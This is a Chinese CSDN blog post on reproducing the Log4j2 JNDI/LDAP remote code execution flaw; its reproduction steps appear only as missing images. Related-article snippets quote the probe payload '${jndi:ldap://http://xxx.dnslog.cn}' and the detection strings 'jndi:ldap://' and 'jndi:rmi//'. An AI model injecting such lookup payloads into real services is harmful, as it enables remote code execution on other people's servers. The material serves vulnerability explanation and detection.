【LOG4J RCE漏洞分享】

最新推荐文章于 2024-08-15 09:37:32 发布
最新推荐文章于 2024-08-15 09:37:32 发布
阅读量2.6k 收藏 1
点赞数 1
分类专栏: log 文章标签: 安全 web安全 log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yin18827152962/article/details/121943501
版权
本文介绍了Apache Log4j2的严重远程代码执行漏洞(LOG4J2-3201),该漏洞影响了大量业务线。通过日志打印,作者成功复现了远程命令执行。利用JNDI:LDAP的方式,作者展示了如何注入类并执行命令。博客详细展示了漏洞的原理和实际操作,对于理解此安全问题具有指导意义。
摘要由CSDN通过智能技术生成

LOG4J RCE漏洞分享

先说结论:有中标,原因在于引⼊的Lo4j2 2.10.0 ,应该绝⼤多业务线都有这个问题,毕竟⽇志组件都是⼀个。
漏洞原因:https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues
漏洞复现:
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
⽇志打印了,也确实远程执⾏了!

那么同理是不是能够通过JNDI:LDAP的⽅式注⼊⼀个类进来执⾏命令,于是我有⼀个⼤胆的想法!
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
类加载了。。。命令执⾏了

在这里插入图片描述

岁月玲珑
关注
专栏目录
CVE-2021-44228 log4j RCE漏洞原理详细分析排查和修补
m0_61506558的博客
09-14 1414
影响范围和排查方法1、CVE-2021-44228影响版本使用了log4j的组件,并且版本在 2.x
Log4j2 RCE 漏洞复现步骤以及根因
weixin_46073333的博客
12-12 6828
相信大家最近一定被log4j2的远程代码执行漏洞所刷屏了,各个互联网厂商,开源组织,还有相关企业都瑟瑟发抖,相关研发人员也都是加班加点紧急修复和改正。笔者也看了一些相关文章,感觉不少都...
Log4J RCE漏洞
RuiIDS的博客
01-06 745
首先log4j打印日志有四个级别:debug、info、warn、error;不管哪个方法打印日志,正常的log处理过程中,对${这两个紧邻的字符做检测,一旦遇到类似报答是结构的字符串就会触发替换机制。一旦log字符串中检测到${},就会解析其中的字符串尝试使用 JDNI的lookup()方法查询,因此,只要能可攻至log阐述内容,就有机会实现漏洞利用。或者说服务器会记录用户输入的信息;这样log4j RCE都会被触发;
log4j RCE 漏洞
b10d9的博客
12-19 4124
漏洞概述 记录本次log4j可以远程命令执行的漏洞。 CVE-2021-44228(log4shell):受影响版本:2.0-beta9(2013年9月发布)-2.14.1(2021年3月发布) CVE-2021-45046:受影响版本: 2.0-beta9 to 2.15.0, excluding 2.12.2 log4j是一款基于java的日志工具,是Apache logging server的一部分,是使用非常广泛的一种java日志框架,所以受影响范围极广。 漏洞原理 本次漏
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
最新发布
baimao__Ch的博客
08-15 716
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
weixin_43895765的博客
12-15 7672
由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)
“核弹级” Log4j 漏洞仍普遍存在,并造成持续影响
码农code之路
07-26 155
出品:OSCHINA,编辑:白开水不加糖来源:https://www.oschina.net/news/203874/log4j-the-pain-just-keeps-going-and-goingLog4j “核弹级” 漏洞 Log4Shell 或许将永远影响世界。美国国土安全部 (DHS) 网络安全审查委员会 (CSRB) 近日发布了针对去年Log4Shell漏洞...
log4j漏洞
远行的博客
12-12 692
文章目录1JNDI 1 JNDI https://blog.csdn.net/liushuai_ly/article/details/8634957 https://blog.csdn.net/liushuai_ly/article/details/8634957
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
log4j 漏洞
系统看你学习很认真,随机送了一个月会员!
12-13 4820
突发!Log4j 爆“核弹级”漏洞,Flink、Kafka等至少十多个项目受影响 Apache Log4j远程代码执行漏洞 | 二次安全通告
log4j漏洞 [log4j]
刘贵庆的博客
01-06 3398
log4j漏洞及解决方法。安全漏洞 CVE-2021-45046 让Apache紧急升级,刚升级完,又发现安全漏洞 CVE-2021-45105,修复方法如下:
漏洞预警:Apache Log4j RCE漏洞
热门推荐
weixin_43526443的博客
12-13 7万+
目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 源码分析 Part5 漏洞检测 自我检测 攻击检测 产品检测 Part6 漏洞修复 Part1 漏洞描述 Apache Log4j是Apache的一个开源项目,Apache log4j2是Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 近日发现Apache Log4j存在任意代码执行
2024年网络安全最全log4j RCE漏洞原理分析及检测_log4j 漏洞监测
2401_84297193的博客
05-03 430
log4j支持使用表达式的形式打印日志,比如问题就在与表达式支持非常多样,其中有一个jndi就是今天的主题jdk将从url指定的路径下载一段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。那么问题来了,攻击者如何控制服务器上记录的日志内容呢?非常简单!大部分web服务程序都会对用户输入进行日志记录。
Apache Log4j Server 反序列化漏洞(CVE-2017-5645)
Kevin's Blog
01-18 4771
文章目录一、漏洞介绍1.1 漏洞介绍1.2 影响版本二、漏洞复现三、防御措施 一、漏洞介绍 1.1 漏洞介绍   Apache的一个开源的日志记录库,通过使用Log4j语言接口,可以在C、C++、.Net、PL/SQL程序中方便使用,其语法和用法与在Java程序中一样,使得多语言分布式系统得到一个统一一致的日志组件模块。通过使用三方扩展,可以将Log4j集成到J2EE、JINI甚至是SNMP应用中。但Log4j2.8.2之前的版本中存在反序列化漏洞。 1.2 影响版本 Log4j<2.8.2 二、
log4j漏洞是什么
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-18 1497
log4j漏洞是什么,Log4j 是一款开源软件,开发者已经将其集成到数百万个系统中。这种无孔不入、无处不在的软件中的漏洞有能力影响全世界的公司和组织(包括政府)。自从2021年11月曝光的Log4j漏洞已成为一大“持续性流行漏洞”,将在未来多年引发持续风险,换言之,这种无所不在的软件库的未经修复版本,将在未来十年或更长时间内继续留存在各类系统当中。同时,美国网络安全审查委员会预测,鉴于 Log4j的普遍存在,在未来十年中,易受攻击的版本仍将存在于系统中,我们将看到利用漏洞的方式不断演变,所有组织都应具备发
log4j RCE漏洞原理分析及检测_log4j 漏洞监测,网络安全开发基础学习
2401_83621004的博客
04-15 750
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。dnslog.cn 是安全检测常用工具之一,在其主页上点击 Get SubDomain 即可以自动生成一个 dnslog.cn 的子域名,这个子域名解析出来的ip是 127.0.0.1,也就是本机地址。因篇幅有限,仅展示部分资料。
log4j RCE漏洞原理分析及检测_log4j 漏洞监测(1),【一步教学,一步到位
weixin_58085973的博客
04-18 567
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。攻击检测后,如果发现 dnslog.cn 中刷新到了dns解析记录,就表示探测成功。
Log4j2_RCE漏洞
01-01 1981
前端时间爆出的Log4j2_RCE漏洞可谓是让安全圈提前过年,今天来复现和简单分析下这个漏洞
LOG4J 漏洞深度分析与安全自查指南
"LOG4J RCE漏洞是一种严重的信息安全问题,影响了广泛使用Apache Log4j2库的软件。此漏洞允许远程代码执行(RCE),由于其普遍性,对全球许多业务线构成威胁。" Apache Log4j2是Java应用程序广泛采用的日志记录框架...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

岁月玲珑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值